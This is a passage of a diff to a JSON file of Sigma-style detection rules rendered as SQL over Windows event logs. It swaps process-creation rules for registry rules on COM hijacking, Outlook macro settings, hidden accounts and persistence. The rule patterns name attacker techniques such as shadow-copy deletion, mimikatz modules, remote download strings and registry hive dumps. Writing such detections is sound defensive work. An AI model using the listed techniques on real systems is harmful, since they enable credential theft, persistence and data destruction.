'%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE 
'%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE 
'%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", 
- "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% 
IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND 
(OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + 
"attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.002" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry 
value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject 
LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" ], - 
"filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects usage of wsudo 
(Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "description": "Detects patterns as 
noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine 